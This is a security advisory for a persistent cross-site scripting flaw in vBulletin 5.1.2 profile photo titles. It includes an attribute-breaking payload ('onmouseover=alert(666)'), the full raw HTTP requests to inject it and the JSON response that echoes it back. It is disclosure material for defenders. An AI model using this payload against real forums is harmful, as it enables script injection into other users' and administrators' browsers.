#Title: vBulletin 5.1.X - Cross Site Scripting #Date: 05.09.14 #Version: => 5.1.2 (Latest ATM) #Vendor: vbulletin.com #Contact: smash [at] devilteam.pl 1) Agenda Latest vBulletin forum software suffers on persistent cross site scripting vulnerability, which most likely can be used against every user, such as administrator. Vulnerability is located at user profile page and will be executed whenever someone will visit it. Solution - proper filtration of image title value, in this case, it's about POST title_13 parameter. 2) Vulnerability First step to reproduce the vulnerability, is to create a user account. By then, you should visit profile of the victim. Let's take as example following address: http://vbulletin/member/2-victim 1. Click 'Share photo' (camera icon), pick any image you like. 2. You may add comment about photo, all you need to do is to add js payload. As comment, use something like - huh" onmouseover=alert(666) xss=" Request: POST /ajax/render/editor_gallery_photoblock HTTP/1.1 Host: vbulletin photocount=1&photos%5B0%5D%5Bfiledataid%5D=13&photos%5B0%5D%5Btitle%5D=cool%22+onmouseover%3Dalert(666)+xssed%3D%22&securitytoken=[TOKEN] 3. Send image by clicking on 'Post' button. Request: POST /create-content/gallery HTTP/1.1 Host: vbulletin Content-Type: multipart/form-data; boundary=---------------------------18897880557155952661558219659 Content-Length: 1558 -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="securitytoken" 1409922799-a28bf50b7ee16f6bfc2b7c652946c366e25574d5 -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="text" -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="uploadFrom" -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="filedataid[]" 13 -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="title_13" cool" onmouseover=alert(666) xssed=" -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="uploadFrom" -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="securitytoken" [TOKEN] -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="parentid" 8 -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="setfor" 5 -----------------------------18897880557155952661558219659-- 4. Done At this point, victim should be noticed about new activity via 'Messages' tab: "attacker has left you a visitor message" Basically, you may use this XSS against any profile. Now, whenever someone will visit profile of victim (ie. http://vbulletin/member/2-victim), he should notice image you uploaded. In this case, js is executed while 'onmouseover', so victim need to click on image. When victim will click on image, js will be executed, and popup will appear. Request: GET /filedata/gallery?nodeid=31&startIndex=0&securitytoken=[TOKEN] HTTP/1.1 Host: vbulletin Response: HTTP/1.1 200 OK Content-Type: application/json; charset=UTF-8 {"photos":[{"title":"cool\" onmouseover=alert(666) xssed=\"","url":"http:\/\/vbulletin\/filedata\/fetch?photoid=33","thumb":"vbulletin\/filedata\/fetch?photoid=33&thumb=1","links":"Photos By <a href=\"vbulletin\/member\/2-victim\">victim.victim@tlen.pl<\/a> in <a href=\"javascript:$('#slideshow-dialog').dialog('close');void(0);\">No Title<\/a><br \/>\n"}]} 3) TL;DR - Visit victim profile - Upload any image - XSS in title (asdf" onmouseover=alert(666) xss=") - Send